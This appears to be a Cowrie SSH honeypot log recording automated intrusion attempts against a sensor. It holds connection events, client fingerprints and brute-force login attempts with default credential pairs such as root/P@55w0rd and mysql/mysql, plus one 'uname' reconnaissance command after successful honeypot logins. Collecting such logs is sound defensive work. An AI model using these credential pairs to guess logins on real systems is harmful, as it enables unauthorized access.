{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T05:48:49.069604Z","src_ip":"103.250.10.42","session":"903684025771"}
{"eventid":"cowrie.session.closed","duration":32.15301585197449,"message":"Connection lost after 32 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:48:49.977722Z","src_ip":"8.222.212.69","session":"0944636812aa"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:48:50.361446Z","src_ip":"103.250.10.42","session":"903684025771"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":53806,"dst_ip":"1.2.3.4","dst_port":22,"session":"08889785d04e","protocol":"ssh","message":"New connection: 217.72.205.35:53806 (1.2.3.4:22) [session: 08889785d04e]","sensor":"my-vps","timestamp":"2025-08-28T05:48:50.402836Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:48:50.404009Z","src_ip":"217.72.205.35","session":"08889785d04e"}
{"eventid":"cowrie.session.connect","src_ip":"103.250.10.42","src_port":36908,"dst_ip":"1.2.3.4","dst_port":22,"session":"d3d2d442f57d","protocol":"ssh","message":"New connection: 103.250.10.42:36908 (1.2.3.4:22) [session: d3d2d442f57d]","sensor":"my-vps","timestamp":"2025-08-28T05:48:50.651261Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T05:48:50.703381Z","src_ip":"103.250.10.42","session":"d3d2d442f57d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T05:48:50.992299Z","src_ip":"103.250.10.42","session":"d3d2d442f57d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50436,"dst_ip":"1.2.3.4","dst_port":22,"session":"b5bebe7ebd4d","protocol":"ssh","message":"New connection: 212.227.125.160:50436 (1.2.3.4:22) [session: b5bebe7ebd4d]","sensor":"my-vps","timestamp":"2025-08-28T05:48:51.128090Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:48:51.156183Z","src_ip":"212.227.125.160","session":"b5bebe7ebd4d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:48:51.271451Z","src_ip":"212.227.125.160","session":"b5bebe7ebd4d"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"tomcat123","message":"login attempt [tomcat/tomcat123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:48:51.677065Z","src_ip":"212.227.125.160","session":"b5bebe7ebd4d"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:48:52.150324Z","src_ip":"103.250.10.42","session":"d3d2d442f57d"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:48:52.444760Z","src_ip":"103.250.10.42","session":"26ceaca2d6ce"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:48:52.445877Z","src_ip":"103.250.10.42","session":"d3d2d442f57d"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:48:52.810776Z","src_ip":"212.227.125.160","session":"b5bebe7ebd4d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52028,"dst_ip":"1.2.3.4","dst_port":22,"session":"688fcc78a79e","protocol":"ssh","message":"New connection: 212.227.235.229:52028 (1.2.3.4:22) [session: 688fcc78a79e]","sensor":"my-vps","timestamp":"2025-08-28T05:49:01.425632Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:49:01.426964Z","src_ip":"212.227.235.229","session":"688fcc78a79e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:49:01.571220Z","src_ip":"212.227.235.229","session":"688fcc78a79e"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"tomcat123","message":"login attempt [tomcat/tomcat123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:49:02.006522Z","src_ip":"212.227.235.229","session":"688fcc78a79e"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:49:03.153090Z","src_ip":"212.227.235.229","session":"688fcc78a79e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48166,"dst_ip":"1.2.3.4","dst_port":22,"session":"8a1bbe88371f","protocol":"ssh","message":"New connection: 212.227.125.160:48166 (1.2.3.4:22) [session: 8a1bbe88371f]","sensor":"my-vps","timestamp":"2025-08-28T05:49:06.927509Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:49:06.928411Z","src_ip":"212.227.125.160","session":"8a1bbe88371f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:49:07.061985Z","src_ip":"212.227.125.160","session":"8a1bbe88371f"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"mysql","message":"login attempt [mysql/mysql] failed","sensor":"my-vps","timestamp":"2025-08-28T05:49:07.424358Z","src_ip":"212.227.125.160","session":"8a1bbe88371f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57033,"dst_ip":"1.2.3.4","dst_port":22,"session":"c946997fce8a","protocol":"ssh","message":"New connection: 212.227.125.160:57033 (1.2.3.4:22) [session: c946997fce8a]","sensor":"my-vps","timestamp":"2025-08-28T05:49:08.141845Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T05:49:08.142521Z","src_ip":"212.227.125.160","session":"c946997fce8a"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T05:49:08.224035Z","src_ip":"212.227.125.160","session":"c946997fce8a"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:49:08.530579Z","src_ip":"212.227.125.160","session":"8a1bbe88371f"}
{"eventid":"cowrie.login.failed","username":"admin1","password":"admin1","message":"login attempt [admin1/admin1] failed","sensor":"my-vps","timestamp":"2025-08-28T05:49:08.651047Z","src_ip":"212.227.125.160","session":"c946997fce8a"}
{"eventid":"cowrie.login.failed","username":"admin1","password":"admin@123","message":"login attempt [admin1/admin@123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:49:09.737166Z","src_ip":"212.227.125.160","session":"c946997fce8a"}
{"eventid":"cowrie.login.failed","username":"admin1","password":"abc123","message":"login attempt [admin1/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:49:10.830102Z","src_ip":"212.227.125.160","session":"c946997fce8a"}
{"eventid":"cowrie.login.failed","username":"admin1","password":"abcd123","message":"login attempt [admin1/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:49:11.919411Z","src_ip":"212.227.125.160","session":"c946997fce8a"}
{"eventid":"cowrie.login.failed","username":"admin1","password":"abcd1234","message":"login attempt [admin1/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-28T05:49:13.002903Z","src_ip":"212.227.125.160","session":"c946997fce8a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47514,"dst_ip":"1.2.3.4","dst_port":22,"session":"709ae2128fa4","protocol":"ssh","message":"New connection: 212.227.235.229:47514 (1.2.3.4:22) [session: 709ae2128fa4]","sensor":"my-vps","timestamp":"2025-08-28T05:49:14.033373Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:49:14.038772Z","src_ip":"212.227.235.229","session":"709ae2128fa4"}
{"eventid":"cowrie.session.closed","duration":"6.0","message":"Connection lost after 6.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:49:14.096229Z","src_ip":"212.227.125.160","session":"c946997fce8a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:49:14.177992Z","src_ip":"212.227.235.229","session":"709ae2128fa4"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"mysql","message":"login attempt [mysql/mysql] failed","sensor":"my-vps","timestamp":"2025-08-28T05:49:14.760232Z","src_ip":"212.227.235.229","session":"709ae2128fa4"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:49:15.906235Z","src_ip":"212.227.235.229","session":"709ae2128fa4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59686,"dst_ip":"1.2.3.4","dst_port":22,"session":"f158a8772026","protocol":"ssh","message":"New connection: 212.227.125.160:59686 (1.2.3.4:22) [session: f158a8772026]","sensor":"my-vps","timestamp":"2025-08-28T05:49:28.365766Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:49:28.386605Z","src_ip":"212.227.125.160","session":"f158a8772026"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:49:28.489410Z","src_ip":"212.227.125.160","session":"f158a8772026"}
{"eventid":"cowrie.login.success","username":"root","password":"P@55w0rd","message":"login attempt [root/P@55w0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:49:28.883905Z","src_ip":"212.227.125.160","session":"f158a8772026"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:49:29.110811Z","src_ip":"212.227.125.160","session":"f158a8772026"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T05:49:29.111686Z","src_ip":"212.227.125.160","session":"f158a8772026"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:49:29.216529Z","src_ip":"212.227.125.160","session":"f158a8772026"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:49:29.217629Z","src_ip":"212.227.125.160","session":"f158a8772026"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33728,"dst_ip":"1.2.3.4","dst_port":22,"session":"648f6f91498f","protocol":"ssh","message":"New connection: 212.227.125.160:33728 (1.2.3.4:22) [session: 648f6f91498f]","sensor":"my-vps","timestamp":"2025-08-28T05:49:35.819381Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:49:35.835349Z","src_ip":"212.227.125.160","session":"648f6f91498f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:49:35.940762Z","src_ip":"212.227.125.160","session":"648f6f91498f"}
{"eventid":"cowrie.login.success","username":"root","password":"1234567890","message":"login attempt [root/1234567890] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:49:36.397516Z","src_ip":"212.227.125.160","session":"648f6f91498f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:49:36.710757Z","src_ip":"212.227.125.160","session":"648f6f91498f"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T05:49:36.711429Z","src_ip":"212.227.125.160","session":"648f6f91498f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:49:36.830397Z","src_ip":"212.227.125.160","session":"648f6f91498f"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:49:36.831579Z","src_ip":"212.227.125.160","session":"648f6f91498f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48510,"dst_ip":"1.2.3.4","dst_port":22,"session":"e3f3b54ab556","protocol":"ssh","message":"New connection: 212.227.235.229:48510 (1.2.3.4:22) [session: e3f3b54ab556]","sensor":"my-vps","timestamp":"2025-08-28T05:49:46.000569Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:49:46.001400Z","src_ip":"212.227.235.229","session":"e3f3b54ab556"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss",